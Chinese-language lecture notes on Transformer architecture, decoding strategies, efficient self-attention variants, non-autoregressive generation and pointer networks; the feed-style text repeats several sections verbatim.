    ​ 这其实是一个最优路径的问题。前面介绍,Decoder 每次输出一个变量,假设输出词汇库只有 A, B 两个词汇。每一次都选择最大概率的作为输出,如下图中红色路径所示,这就是 Greedy Decoding。同时,Decoder 的每个输出又是下一时刻输入,如果我们从整个 sequence 的角度考虑,可能第一次不选最大概率,后面的输出概率(把握)都很大,整体更佳,如下图中绿色路径所示。

    ​ 怎么找到最好的路径(图中绿色路径)?穷尽所有选择(路径)吗?这不现实,运算量太大。一个优化方法就是 Beam Search,比如每次存前两个概率大的输出,下一步把这两种输出各走一遍,依此类推,一直到最后。

    ​ 但是,用 Beam Search 找到分数最高的路径,就一定是最好的吗?比如下图所示文本生成的例子,使用 Beam Search,后面一直在重复同一个句子。而 Pure Sampling 生成的文本至少看起来还正常。

    Sampling

    png

    ​ Beam Search 有时有用,有时没用。对于有明确答案的任务,比如语音识别,beam search 方法表现好。对于有些创造型任务,比如文本生成,Decoder 是需要一些随机性 (randomness)(论文显示可能出现重复输出同一句话)。

    ​ 在实验室做语言合成 (TTS) 的经历。一开始总做不出理想的效果,和 Google 的研究人员交流,他们提到,测试时 Decoder 要加噪声 (noise)。听上去是不是难以置信?训练时 Decoder 加噪可以理解,让模型 more robust。测试时 Decoder 加噪,这不是给自己找麻烦吗?但是,按这个方法去做,效果确实好!没加噪时,Decoder 产生的声音就像机关枪一样。加噪(加入随机性)之后,产生的声音就接近人声。对于 TTS 或文本生成而言,Decoder 用 Beam Search 找到的最好结果,不见得是人类认为的最好结果(不自然)。加入一点随机性,效果反而更好。正如西谚所言:“Accept that nothing is perfect. True beauty lies in the cracks of imperfection.”(没有事情是完美的,真正的完美可能在不完美之中)

    Optimizing Evaluation Metrics?

    png

    ​ 最佳优化评估指标?

    ​ 在 homework 中,train 使用 cross entropy loss 做 criterion,要使 output 和 label 在对应 vector 上 cross-entropy 最小。而评估模型用的是 BLEU score, 是在两个 sequence 上运算(cross entropy 最小的模型 BLEU socre 不一定最大)。因此,validation 挑选模型时也用 BLEU score 作为衡量标准。

    ​ 那么,training 直接就用 BLEU score 做 criterion 岂不更好?

    ​ 问题就在于:BLEU score 没办法微分,不知道要怎么做 gradient descent。实在要做:Reinforcement Learning(RL)。

    ​ 秘诀:”When you don’t know how to optimize, just use reinforcement learning(RL).” 遇到在 optimization 无法解决的问题,用 RL “硬 train 一发”。

    png

    ​ exposure bias:训练和测试时不一致:训练时 Decoder 永远看到正确的东西,而测试时可能看到错误的东西(可能一步错步步错)。

    ​ 有些解决方法:给训练时加一点错误的东西:Scheduled Sampling

    Scheduled Sampling

    png

    Scheduled Sampling(可能会伤害到 transformer 的并行计算能力)

    png

    Class Material

    ##【機器學習 2022】各式各樣神奇的自注意力機制 -Self-attention- 變型

    png

    ​ 本节主要讲 Transformer 的变形:

    png

    ​ 原始的 self-attention 的 Attention Matrix 大小为 $N\times N$,当 $N$ 特别大时计算量很大。

    png

    Notice

    • 对于 transformer 来说,self-attention 只是大的网络架构中的一个 module
    • 由上述分析我们知道,对于 self-attention 的运算量是跟 N 的平方成正比的。当 N 很小的时候,单纯增加 self-attention 的运算效率可能并不会对整个网络的计算效率有太大的影响。
    • 这种问题一般是用在处理图像的问题上,如一张 $256\times 256$ 的图像,其 $N=256\times256=65536$。

    png

    ​ 用人类知识跳过某些计算,选择性的计算 Attention Matrix 中的某些数值或者某些数值不需要计算就可以知道数值,理论上可以减小计算量,提高计算效率。

    Local Attention / Truncated Attention

    png

    ​ 举个例子,比如我们在做文本翻译的时候,有时候在翻译当前的 token 时不需要给出整个 sequence,其实只需要知道这个 token 两边的邻居,就可以翻译的很准,也就是做局部的 attention(local attention)。这样可以大大提升运算效率,但是缺点就是只关注周围局部的值,这样做法其实跟 CNN 就没有太大的区别了。

    Stride Attention

    png

    ​ 如果觉得上述这种 local attention 不好,也可以换一种思路,就是在翻译当前 token 的时候,给它空一定间隔(stride)的左右邻居,从而捕获当前与过去和未来的关系。当然 stride 的数值可以自己确定。

    Global Attention

    png

    ​ global attention 选择 sequence 中的某些 token 作为 special token(比如标点符号),或者在原始的 sequence 中增加 special token。让 special token 与序列产生全局的关系,但是其他不是 special token 的 token 之间没有 attention。

    Add special token into original sequence

    • Attend to every token → collect global information
    • Attended(参加)by every token → it knows global information

    png

    ​ 对于上述三种 Attention,可以使用 different heads 使用多种 attention 机制。

    png

    Can we only focus on Critical Parts?

    png

    ​ 上面集中方法都是人为设定的哪些地方需要算 attention,哪些地方不需要算 attention,但是这样算是最好的方法吗?并不一定。对于 Attention Matrix 来说,如果某些位置值非常小,我们可以直接把这些位置设为 0,这样对实际预测的结果也不会有太大的影响。也就是说我们只需要找出 Attention Matrix 中 attention 的值相对较大的值。但是如何找出哪些位置的值非常小/非常大呢?

    Clustering

    png

    png

    ​ 下面这两个文献中给出一种 Clustering(聚类)的方案,即先对 query 和 key 进行聚类。属于同一类的 query 和 key 来计算 attention,不属于同一类的就不参与计算,这样就可以加快 Attention Matrix 的计算。比如下面这个例子中,分为 4 类:1(红框)、2(紫框)、3(绿框)、4(黄框)。在下面两个文献中介绍了可以快速粗略聚类的方法。

    Learnable Patterns

    png

    ​ 上述我们所讲的都是 NN 的 Matrix,但是实际来说,这样的 Matrix 通常来说并不是满秩的,也就是说我们可以对原始 NN 的矩阵降维,将重复的 column 去掉,得到一个比较小的 Matrix。

    Do we need full attention matrix?

    png

    png

    ​ 具体来说,从 N 个 key 中选出 K 个具有代表的 key,每个 key 对应一个 value,然后跟 query 做点乘。然后做 gradient-decent,更新 value。

    ​ 为什么选有代表性的 key 不选有代表性的 query 呢?因为 query 跟 output 是对应的,这样会 output 就会缩短从而损失信息。

    Reduce Number of Keys

    png

    ​ 怎么选出有代表性的 key 呢?这里介绍两种方法:

    png

    ​ 回顾一下注意力机制的计算过程,其中 I 为输入矩阵,O 为输出矩阵,暂时忽略 softmax 过程。

    png

    ​ 矩阵乘法交换计算顺序,得出的结果相同,但是计算量可能不同。

    png

    ​ 依法$O\approx V(K^TQ)$ 计算($(d+d’)N^2$ 次乘法)要比 $O\approx (VK^T)Q$ 计算($2dd’N$ 次乘法)量大得多。

    png

    ​ 把 softmax 拿回来……

    png

    png

    如果我们可以将 $\exp(q\cdot k)$ 转换成两个映射相乘 $\approx \phi(q)\cdot\phi(k)$ 的形式,那么可以对上式进行进一步简化:

    png

    png

    png

    png

    png

    png

    png

    Realization

    png

    ​ 可以这样去理解,将 φ(k) 跟 v 计算的 vector 当做一个 template,然后通过 φ(q) 去寻找哪个 template 是最重要的,并进行矩阵的运算,得到输出 b。

    那么 φ 到底如何选择呢?不同的文献有不同的做法:

    png

    ​ 在计算 self-attention 的时候一定需要 q 和 k 吗?不一定。在 Synthesizer 文献里面,对于 attention matrix 不是通过 q 和 k 得到的,而是作为网络参数学习得到。虽然不同的 input sequence 对应的 attention weight 是一样的,但是 performance 不会变差太多。其实这也引发一个思考,attention 的价值到底是什么?

    Attention-free

    png

    ​ 不使用 attention 机制处理 seq2seq 问题:

    Summary

    png

    图中横轴为训练速度,纵轴为性能得分。

    • Human knowledge
      • Local Attention,Big Bird
    • Clustering
      • Reformer
    • Learnable Pattern
      • Sinkforn
    • Representative key
      • Linformer
    • k, q first → v, k first
      • Linear Transformer, Performer
    • New framework
      • Synthesizer

    Extra Material

    -DLHLP 2020- Non-Autoregressive Sequence Generation -由助教莊永松同學講授-

    png

    条件序列生成:语音识别

    png

    其他条件序列生成:

    • Image Caption Generation 给一张图片返回文字描述
    • Machine Translation 机器翻译

    Autoegressive model (inference stage)

    png

    ​ RNN,逐个的吃 token,然后生成 token 的时候是生成下一个 token 的时候要参考当前时间步的 token,因此,无论是输入和输出都比较花费时间。

    ​ 后来有了 BERT,这个时候就可以用 BERT 替换输入模块,这个时候可以直接一次把所有的输入都吃进来,不用一个个的吃,输入的速度是解决了,但是输出还是和 RNN 一样,一个个的往外吐。

    png

    ​ 因此,就想能不能把输出也改成直接吐所有的 token 的模式,这个就是 Non-autoregressive model 的目标。

    What‘s the problem?

    png

    要实现上面提出的目标,有难度,借用之前 ML 课程中讲过的一个例子来说:
    有一个 Text-to-lmage 的任务,就是给一段文字,然后模型为文字配一个图片,传统使用有监督的方式进行训练,例如下图中给出的文字是奔跑的狗子,那么模型生成的图片要和 ground truth 要越接近越好。

    png

    ​ 由于各个神经元之间没有相互联系,输出的模型又想像这张图片,又想像那张图片。

    png

    ​ 假如我们使用 Non-Autoregressive Sequence Generation 的方式来进行 translation。输入是【Hello!】,输出可以看到有好几种合理的翻译。可以看到输出第一个 token 中【哈】【你】几率都相等,都为 50%,第二个 token 同理。那么在输出整个 sequence 的时候就有可能是 你喽/哈好。

    ​ 明显这两个都是错误的翻译,但是都是有可能被模型 sample 出来的结果。我们将这个问题称为:multi-modality problem,同一个输入,可能对应多个输出,那么 Non-Autoregressive 模型就会把各种可能的输出进行叠加,导致错误。

    png

    generate target / methodsImageText
    naive approachDeconvolution layer + L2 loss,求均值,效果差non-autoregressive decoder,multi-modality problem 本文重点要解决的问题
    autoregressivePixelRNN, VQVAE-2,效果好autoregressive decoder,成熟,缺点是一个个输出效率低
    Generative Adversarial Networks/ non-auto model效果好文字应用还不成熟,待研究

    Vanilla NAT (Non-Autoregressive Translation)

    png

    Fertility

    png

    Sequence-level knowledge distillation

    png

    png

    NPD

    png

    Autogressive model w/teacher forcing

    png

    Evolution of NAT

    png

    NAT with lterative Refinement

    png

    Mask-Predict

    png

    png

    Insertion Transformer

    png

    ​ Partially Autoregressive Model,不是纯正的 NAT,该模型会在每两个字之间做预测,是否需要插入新字

    png

    png

    Multiple target words to predict?

    png

    png

    KERMIT

    png

    这个算法对于 Insertion Transformer 而言是将 encoder 和 Decoder 都合并在一起了

    png

    png

    Levenshtein Transformer

    png

    ​ 这个模型是在插入的基础上加入了删除功能,模型如下图所示:

    png

    可以看到输入经过 encoder 之后得到初始的输出要经过三个 Decoder:

    • 第一个 Decoder 是一个删除分类器,判断是否需要删除当前单词;
    • 第二个 Decoder 是一个插入分类器,判断是否要在当前单词与单词之间插入单词,如果插入则生成一个占位符【PLH】place holder;
    • 第三个 Decoder 是 token 分类器,根据【PLH】的位置预测对应的单词。

    ​ 这个模型训练就是采用上面提到的从另外一个模型学习的方法(knowledge distillation)。具体算法称为:Levenshtein Distance Algorithm

    import Levenshtein
    Levenshtein.distance("ABCEFGHJJ", "ABCDEFGHI")
    3
    Levenshtein.editops("ABCEFGHJJ", "ABCDEFGHI")
    [('insert', 3, 3), ('delete', 7, 8), ('replace', 8, 8)]

    png

    CTC

    png

    ​ CTC 也是 Non-Autoregressive 模型,只不过用在语音识别上;

    ​ 语音识别没有 multi-modality 问题,就是一段语音对应多个结果。(特殊情况当然也有,不过加入 LM 可以解决,例如有人说:城市/程式还不错!)

    Block Decoding

    png

    png

    Knowledge Distillation in NAT

    png

    ​ 最后给出来 NAT 对 Autoregressive 模型进行 Knowledge Distillation 后效果提升的研究,语料中原文为英文,译文有 de 德文,es 西班牙文,fr 法文,然后 Autoregressive 模型翻译结果非常清楚,一句话翻译出来是三种目标文字中的一种,不会混乱(下图中第一个图每一个点代表一个句子。),但是 NAT 模型就不行,最后以 Autoregressive 模型为例进行学习后,NAT 可以获得很好的效果。

    Reference

    png

    png

    Pointer Network

    ​ Pointer Network 是[seq2seq 模型](https://www.zhihu.com/search?q=seq2seq 模型&search_source=Entity&hybrid_search_source=Entity&hybrid_search_extra={“sourceType”%3A"answer"%2C"sourceId"%3A1187307191})的一个变种。他们不是把一个序列转换成另一个序列, 而是产生一系列指向输入序列元素的指针。最基础的用法是对可变长度序列或集合的元素进行排序。

    ​ 传统的 seq2seq 模型是无法解决输出序列的词汇表会随着输入序列长度的改变而改变的问题的。在某些任务中,输入严格依赖于输入,或者说输出只能从输入中选择。例如输入一段话,提取这句话中最关键的几个词语。又或是输入一串数字,输出对这些数字的排序。这时如果使用传统 seq2seq 模型,则忽略了输入只能从输出中选择这个先验信息,Pointer Networks 正是为了解决这个问题而提出的。

    Pointer Network

    png

    ​ pointer network 是一种对 attention 机制的应用。它的输出是输入的子集(相当于输出的是输入序列中部分元素的 copy)

    引例:使用 NN 求解一堆散点的凸包,输入是一堆点的坐标,输出是一个序列,每个元素表示选择了第几个输入的点。

    png

    ​ 首先考虑使用 seq2seq,但是会存在一个问题,因为我们输出的“候选集”的长度应该是 1~输入元素的个数,而输入的点的个数是不确定的,所以这个输出的候选集是变的(也就是每一个输出时间步中,softmax 输出的种类数是变化的)。(注意,这个候选集指的不是序列的长度,序列的长度是构成凸包的点的个数)在 seq2seq 模型中,只有输出序列的长度是变的,而这个 softmax 的类别数是固定的。

    png

    ​ 解决方法,用 attention 机制对每一个输入元素做 attention,取这个 attention weight 来做 softmax,然后取 argmax 得到当前时间步的输出。为什么这样做 work:因为输出每一步会对输入的所有元素去 attention,这个 attention vector 的维度正好等于输入的个数,所以每个时间步的分类个数就等于输入元素数。

    ​ 用 $(x_0,y_0)$ 表示 END,当 argmax 的结果是 $(x_0,y_0)$ 时,结束。

    Applications - Summarization

    png

    ​ 其他应用:summary 给一段文章,返回它的简介。

    ​ 之所以加入 pointer network 在这个任务上可以比 seq2seq 更好,一个原因是,文章中一般会出现一些人名地名,而这些东西可能在我们的词汇表里没有。另外,pointer network 可以直接从 input 中挑关键词出来,所以更适合做 summary。

    ​ 上面的方案是传统 seq2seq + pointer network。特点是学出来的一个 weight $p_{gen}$,表示 pointer network 和 seq2seq 分布结果的加权,求和之后得到最后的分布。

    png

    ​ 其他应用:机器翻译/chat bot,思想就是从输入中直接取一部分(这部分可能不在词汇库中)

    ]]>
    + Preparation

    ##【機器學習 2021】Transformer -上-

    Transformer 是 2017 年引入的深度学习模型,主要用于自然语言处理领域。与循环神经网络一样,Transformers 旨在处理顺序数据(例如自然语言),以执行翻译和文本摘要等任务。但是,与 RNN 不同,Transformers 不需要按顺序处理顺序数据。

    png

    Seq2seq 问题:输入一个序列,输出一个序列,输出序列的长度由模型决定。

    • Speech Recognition:输入一段语音 T,输出对应的文字 N。
    • Machine Translation:输出一段文字 N,输出另一种语言的文字 N’。
    • Speech Translation:输入一段语音(这段语音使用的语言可能没有对应的文字),输出另一种语言的文字。
      • 对于有文字的语言,可以将 Speech Recognition 和 Machine Translation 结合成 Speech Translation,但是没有文字的语言就不行。

    png

    ​ 尝试使用 1500 小时的乡土剧(台语声音,中文字幕)做数据集,让机器试着听台语输出中文。

    png

    ​ 不考虑训练集中 BGM、噪音、翻译文本的噪声、台语的口音等的因素。

    png

    ​ 最后也能得到差强人意的效果。

    png

    ​ Taiwanese Speech Synthetic:语音辨识反过来:语言合成,输入文本,输出台语的项目。

    png

    ​ Seq2seq model 用在聊天模型中。

    png

    ​ 把所有对话问题(各式各样的 NLP 问题)当作 QA 问题,用 seq2seq 模型解决。输入 question,context,输出 answer。

    png

    ​ 将 seq2seq 模型用在文法分析 Syntactic Parsing 中:输入一句话,输出这句话的语法成分(将语法成分看作用序列表示的一棵树)。

    png

    png

    ​ 用在多标签分类问题。(同一个东西可能属于不同分类)输入一个文章,输出几个 class(由机器及自己决定)

    png

    ​ 用在目标检测(看似没有关系,但是可以用 seq2seq 硬做)

    png

    ​ 在 2014 年,就提出了 Seq2seq 模型(不过时间比较久远,模型比较旧):[1409.3215] Sequence to Sequence Learning with Neural Networks (arxiv.org)。由两个 RNN 分别组成了 Encoder、Decoder,可以应用于机器翻译。

    png

    ​ 今天典型的 seq2deq model:Transformer [1706.03762] Attention Is All You Need (arxiv.org)

    一般的 seq2seq model 会分成两块:Encoder(负责处理 input 的 seq)、Decoder(决定输出什么样的 seq)

    Encoder

    png

    png

    ​ 在 seq2seq 模型中的 Encoder 要做的事情就是 输入一排向量,输出另一排向量。能实现输入一排向量,输出一排向量功能的模型有 Self-attention、CNN 和 RNN 等模型,而 Transformer 中用到的则是 Multi-Head attention 模型

    png

    ​ Transformer 中有 N 个 Block,每个 Block 中包含了 Multi-Head Attention 和 Fully Connected 的 Feed Forward Network。

    • 先做一个 self-attention,输入一排向量,经过 self-attention 考虑整个 sequence 的信息后,输出另外一排向量。
    • 接下来将输出的这一排向量输入到 fully connected 的前馈网络中,得到处理后的向量,就是 Block 的输出。

    png

    ​ Transformer 引入了 residual connection,直接把 input 的 $a$ 和 output 的 $b$ 加起来得到新的 vector,再进行 layer normalization,得到 self-attention 的输出(FC 网络的输入)。

    ​ 在 fully connected 中也增加了同样的 residual 网络结构,FC 网络的输出先直接加上它对应的输入,然后经过 layer normalization 之后才是 FC 网络最终的输出。

    Layer Norm:

    $$x’_i=\frac{x’_i-m}{\sigma}$$

    png

    ​ BERT 就使用了 transformer Eecoder。

    Encoder 总结

    • 在将输入向量进行 self-attention 之前,先加上 Positional Encoding,也就是输入向量中的位置信息。

    • Multi-Head Attention:进行 Multi-Head 的 self-attention 处理得到输出向量。

    • Add & Norm (residual & layer normalization): 也就是将 self-attention 的输出加上它对应的输入然后对其进行 Layer Normalization。

    • Feed Forward:将上一层的输出输入到 fully connected Network 中,将得到的输出向量和对应的输入向量同样经过 residual & layer normalization 操作后得到该 block 的最终输出。

    • 将这个 block 重复 n 次。

    png

    尝试对原始的 transformer 的改进:[2002.04745] On Layer Normalization in the Transformer Architecture (arxiv.org)

    为什么说要用 layer normalization 而不是 batch normalization:[2003.07845] PowerNorm: Rethinking Batch Normalization in Transformers (arxiv.org)

    ##【機器學習 2021】Transformer -下-

    Decoder 分为 Auto regressive(AT)和 Non-Auto regressive(NAT)两种。其中 AT 应用范围更为广泛一些。

    Decoder-Autoregressive (AT)

    png

    png

    ​ 以 Speech Recognition 为例,从一段音频文件转换为文字序列。先由 Encoder 将这段音频变成一排 vector,再由 Decoder 将这排 vector 变成一段文字。每一个文字(Token)都用一个独热编码的向量表示(如果是英文,会更复杂)。BEGIN 和 END 被作为特殊的 Token。

    • 在 Encoder 完成之后,将其输出作为一个输入喂到 Decoder 中。

    • 同时,输入一个 special token:BEGIN 表示开始工作。

    • Decoder 结合这两个输入,输出一个经过 softmax 处理后的长度为 Vocabulary Size 的输出向量(是个概率分布),该向量中每一个中文字都对应一个数值,数值最大的中文字为最终输出的中文字,下图中,输出的结果是“机”。

    png

    ​ 接下来将“机”作为 Decoder 的输入,输出”器“,依次法得到”学“和”习“。(Decoder 会把自己的输入当作接下来的输出)

    png

    ​ Decoder 的结构。

    png

    ​ Encoder 与 Decoder 相比,每一个 block 中 Decoder 比 Encoder 多了中间的一个 Multi-Head Attention,同时第一个自注意力机制使用的是 Masked Multi-Head Attention
    png

    Masked Self-attention 与 Self-attention 的不同

    ​ Masked Self-attention 的计算顺序其实是和 Decoder 的串行计算顺序相对应的,以上图中计算 $b^2$ 为例:在计算 $b^2$ 的时候,和原来的 Self-attention 考虑所有输入信息 $[a1,a2,a3,a4]$ 不同,Masked Self-attention 考虑 $[a1,a2]$ , 因为此时的 $[a3,a4]$ 还没有计算出来。

    Why masked?

    ​ Encoder 是知道所有的 $a$,所以使用 Self-attention,而 Decoder 需要知道前一个的输出作为输入,不知道所有的 $a$(只能考虑左边的东西,不能考虑右边的东西),所以使用 Masked Multi attention。

    png

    png

    Decoder 无法知道最终输出的长度?

    ​ 加入 special token:STOP,机器就会停止。

    png

    ​ 要让机器识别出“机器学习”后,会输出 END。

    Decoder-Non-Autoregressive (NAT)

    png

    png

    ​ 与 AT 不同的是,NAT 并不使用之前时刻的输出,而是一次输入一组 special token。

    • How to decide the output length for NAT Decoder?

      • Another predictor for output length(由其他部分决定输出长度)

      • Output a very long sequence, ignore tokens after END

    • Advantage:

      • parallel
        • AT 一次输出一个 vector(因为上一个输出又作为下一个输入),无法并行处理。而 NAT 可以并行处理,NAT 速度比 AT 更快,在有 self-attention 之前,RNN 和 LSTM 是不能设计 NAT 的。
      • controllable output length
        • 比如在语音合成 (TTS) 任务中,把 Eecoder 的输出送入一个 Classifier,预测 Decoder 输出 sequence 长度。通过改变这个 Classifier 预测的长度,可以调整生成语音的语速。例如,设置输出 sequence 长度 x2,语速就可以慢一倍。
    • NAT is usually worse than AT (why? Multi-modality 多模态的问题)

    了解更多 NAT:https://youtu.be/jvyKmU40M3c

    Encoder-Decoder

    png

    png

    ​ Encoder 与 Decoder 联系起来的部分:Cross attention。两个输入 $(k,v)$ 来自 Encoder,一个输入 $q$ 来自 Decoder。它计算的是 Encoder 的输出与当前 vector 的 cross attention。

    png

    ​ 用 Decoder 中 Self-attention 层的输出 vector 生成 $q$,与由 Encoder 最后一层输出 sequence 产生的 $(k,v)$ 做运算。

    png

    ​ Cross Attention 实际的展示:Listen, attend and spell: A neural network for large vocabulary conversational speech recognition

    ​ 并不是 transformer,说明先有 cross attention 机制后才有的 self-attention 机制。

    png

    ​ 试想一下,如果你要做一个演讲,虽然记了演讲内容,但还是会担心一上台紧张忘词。怎么办呢?可以把提纲写在卡片上,演讲中看上一眼,就知道接下来要讲什么了。我觉得 cross attention 的作用就有点像这个小卡片,因为它看过整个 sequence,可以给 Decoder 提示信息。

    ​ cross attention 在早期的 Seq2seq 模型论文中就已经出现,是 Seq2seq 的重要单元。看到 seq2seq model with attentionYannic Kilcher 大神的论文解读视频 介绍,早期 Seq2seq 模型的 Eecoder 和 Decoder 是用 RNN,attention 用在 cross attention 单元。本来 Decoder 只能利用 Eecoder RNN 最后一个时刻的 hidden state,用了 cross attention 之后,之前时刻的 hidden state 也可以看。哪个时刻的 hidden state 对当前 Decoder 输出最相关 (attention),重点看这个 hidden state,这样模型的性能更好。而 Transformer 架构干脆把 Eecoder 和 Decoder 也全部用 attention 来做 (Self-attention),正如论文标题所言 “Attention is all you need”。

    ​ 你可能会有疑问,Decoder 有很多层 self-attention,每一层 self-attention 的输出都是与 Eecoder 最后的输出 sequence 做 cross attention 吗?可以有不同的设计吗?Transformer 论文中是这样设计,但是也可以用不同的设计,现在已经有一些这方面的研究和实验。

    ​ 不同的 Cross Attention 连接方式:[2005.08081] Rethinking and Improving Natural Language Generation with Layer-Wise Multi-View Decoding (arxiv.org)

    Training

    png

    png

    ​ Decoder 的输出 (output) 是一个概率分布,label 是 one-hot vector,优化的目标就是使 label 与 Decoder output 之间的 cross entropy 最小。这其实是一个分类问题。

    png

    ​ Decoder 中,前一个输出又作为下一个输入。使用 Teacher Forcing 方法,Decoder 输入用的是 ground truth value(在训练的时候会给 Decoder 看正确答案)。

    ​ 测试的时候没有正确答案?可能会有 mis match 的问题。

    Copy Mechanism

    png

    ​ Copy Mechanism 指在文本生成领域,生成的输出是输入序列元素的复制或者指向。该机制最早由 Vinyals et al.(2015)在 Pointer Network 中提出,所以有时也被称为 Pointer Mechanism 指针机制。

    ​ 有些情况,不需要对输入做改动,比如翻译人名地名,聊天机器人(chat-bot),摘要 (summarization) 等,可以直接复制一部分输入内容。

    ​ 具体的方法:

    • Pointer Network
    • Copy network

    png

    应用:给机器读一篇文章,让机器输出一篇文章的摘要。

    png

    Seq2seq model 如何做到 Copy Mechanism?

    Guided Attention

    png

    ​ 举了一个语音合成 (TTS) 的例子,机器一次说四遍“发财”这个词时,说得挺好,还有抑扬顿挫之感。一次说三遍或两遍“发财”也正常。但是,一次说一遍“发财”时,不知怎的,只有一个音“财”(也许机器不知道怎么处理非常短的句子)。

    png

    ​ 从这个例子可以看到,在处理语音识别 (speech recognition) 或语音合成 (TTS) 等任务时,我们不希望漏掉其中的任何一段内容,Guided Attention 正是要满足这个要求。而 chat-bot, summary 一类的应用在这方面的要求就宽松得多。

    ​ Guided Attention 是让 attention 的计算按照一定顺序来进行。比如在做语音合成时,attention 的计算应该从左向右推进,如下图中前三幅图所示。如果 attention 的计算时顺序错乱,如下图中后三幅图所示,那就说明出了错误。具体方法:Monotonic Attention, Location-aware attention。

    png

    ​ 这其实是一个最优路径的问题。前面介绍,Decoder 每次输出一个变量,假设输出词汇库只有 A, B 两个词汇。每一次都选择最大概率的作为输出,如下图中红色路径所示,这就是 Greedy Decoding。同时,Decoder 的每个输出又是下一时刻输入,如果我们从整个 sequence 的角度考虑,可能第一次不选最大概率,后面的输出概率(把握)都很大,整体更佳,如下图中绿色路径所示。

    ​ 怎么找到最好的路径(图中绿色路径)?穷尽所有选择(路径)吗?这不现实,运算量太大。一个优化方法就是 Beam Search,比如每次存前两个概率大的输出,下一步把这两种输出各走一遍,依此类推,一直到最后。

    ​ 但是,用 Beam Search 找到分数最高的路径,就一定是最好的吗?比如下图所示文本生成的例子,使用 Beam Search,后面一直在重复同一个句子。而 Pure Sampling 生成的文本至少看起来还正常。

    Sampling

    png

    ​ Beam Search 有时有用,有时没用。对于有明确答案的任务,比如语音识别,beam search 方法表现好。对于有些创造型任务,比如文本生成,Decoder 是需要一些随机性 (randomness)(论文显示可能出现重复输出同一句话)。

    ​ 在实验室做语言合成 (TTS) 的经历。一开始总做不出理想的效果,和 Google 的研究人员交流,他们提到,测试时 Decoder 要加噪声 (noise)。听上去是不是难以置信?训练时 Decoder 加噪可以理解,让模型 more robust。测试时 Decoder 加噪,这不是给自己找麻烦吗?但是,按这个方法去做,效果确实好!没加噪时,Decoder 产生的声音就像机关枪一样。加噪(加入随机性)之后,产生的声音就接近人声。对于 TTS 或文本生成而言,Decoder 用 Beam Search 找到的最好结果,不见得是人类认为的最好结果(不自然)。加入一点随机性,效果反而更好。正如西谚所言:“Accept that nothing is perfect. True beauty lies in the cracks of imperfection.”(没有事情是完美的,真正的完美可能在不完美之中)

    Optimizing Evaluation Metrics?

    png

    ​ 最佳优化评估指标?

    ​ 在 homework 中,train 使用 cross entropy loss 做 criterion,要使 output 和 label 在对应 vector 上 cross-entropy 最小。而评估模型用的是 BLEU score, 是在两个 sequence 上运算(cross entropy 最小的模型 BLEU socre 不一定最大)。因此,validation 挑选模型时也用 BLEU score 作为衡量标准。

    ​ 那么,training 直接就用 BLEU score 做 criterion 岂不更好?

    ​ 问题就在于:BLEU score 没办法微分,不知道要怎么做 gradient descent。实在要做:Reinforcement Learning(RL)。

    ​ 秘诀:”When you don’t know how to optimize, just use reinforcement learning(RL).” 遇到在 optimization 无法解决的问题,用 RL “硬 train 一发”。

    png

    ​ exposure bias:训练和测试时不一致:训练时 Decoder 永远看到正确的东西,而测试时可能看到错误的东西(可能一步错步步错)。

    ​ 有些解决方法:给训练时加一点错误的东西:Scheduled Sampling

    Scheduled Sampling

    png

    Scheduled Sampling(可能会伤害到 transformer 的并行计算能力)

    png

    Class Material

    ##【機器學習 2022】各式各樣神奇的自注意力機制 -Self-attention- 變型

    png

    ​ 本节主要讲 Transformer 的变形:

    png

    ​ 原始的 self-attention 的 Attention Matrix 大小为 $N\times N$,当 $N$ 特别大时计算量很大。

    png

    Notice

    • 对于 transformer 来说,self-attention 只是大的网络架构中的一个 module
    • 由上述分析我们知道,对于 self-attention 的运算量是跟 N 的平方成正比的。当 N 很小的时候,单纯增加 self-attention 的运算效率可能并不会对整个网络的计算效率有太大的影响。
    • 这种问题一般是用在处理图像的问题上,如一张 $256\times 256$ 的图像,其 $N=256\times256=65536$。

    png

    ​ 用人类知识跳过某些计算,选择性的计算 Attention Matrix 中的某些数值或者某些数值不需要计算就可以知道数值,理论上可以减小计算量,提高计算效率。

    Local Attention / Truncated Attention

    png

    ​ 举个例子,比如我们在做文本翻译的时候,有时候在翻译当前的 token 时不需要给出整个 sequence,其实只需要知道这个 token 两边的邻居,就可以翻译的很准,也就是做局部的 attention(local attention)。这样可以大大提升运算效率,但是缺点就是只关注周围局部的值,这样做法其实跟 CNN 就没有太大的区别了。

    Stride Attention

    png

    ​ 如果觉得上述这种 local attention 不好,也可以换一种思路,就是在翻译当前 token 的时候,给它空一定间隔(stride)的左右邻居,从而捕获当前与过去和未来的关系。当然 stride 的数值可以自己确定。

    Global Attention

    png

    ​ global attention 选择 sequence 中的某些 token 作为 special token(比如标点符号),或者在原始的 sequence 中增加 special token。让 special token 与序列产生全局的关系,但是其他不是 special token 的 token 之间没有 attention。

    Add special token into original sequence

    • Attend to every token → collect global information
    • Attended(参加)by every token → it knows global information

    png

    ​ 对于上述三种 Attention,可以使用 different heads 使用多种 attention 机制。

    png

    Can we only focus on Critical Parts?

    png

    ​ 上面集中方法都是人为设定的哪些地方需要算 attention,哪些地方不需要算 attention,但是这样算是最好的方法吗?并不一定。对于 Attention Matrix 来说,如果某些位置值非常小,我们可以直接把这些位置设为 0,这样对实际预测的结果也不会有太大的影响。也就是说我们只需要找出 Attention Matrix 中 attention 的值相对较大的值。但是如何找出哪些位置的值非常小/非常大呢?

    Clustering

    png

    png

    ​ 下面这两个文献中给出一种 Clustering(聚类)的方案,即先对 query 和 key 进行聚类。属于同一类的 query 和 key 来计算 attention,不属于同一类的就不参与计算,这样就可以加快 Attention Matrix 的计算。比如下面这个例子中,分为 4 类:1(红框)、2(紫框)、3(绿框)、4(黄框)。在下面两个文献中介绍了可以快速粗略聚类的方法。

    Learnable Patterns

    png

    ​ 上述我们所讲的都是 NN 的 Matrix,但是实际来说,这样的 Matrix 通常来说并不是满秩的,也就是说我们可以对原始 NN 的矩阵降维,将重复的 column 去掉,得到一个比较小的 Matrix。

    Do we need full attention matrix?

    png

    png

    ​ 具体来说,从 N 个 key 中选出 K 个具有代表的 key,每个 key 对应一个 value,然后跟 query 做点乘。然后做 gradient-decent,更新 value。

    ​ 为什么选有代表性的 key 不选有代表性的 query 呢?因为 query 跟 output 是对应的,这样会 output 就会缩短从而损失信息。

    Reduce Number of Keys

    png

    ​ 怎么选出有代表性的 key 呢?这里介绍两种方法:

    png

    ​ 回顾一下注意力机制的计算过程,其中 I 为输入矩阵,O 为输出矩阵,暂时忽略 softmax 过程。

    png

    ​ 矩阵乘法交换计算顺序,得出的结果相同,但是计算量可能不同。

    png

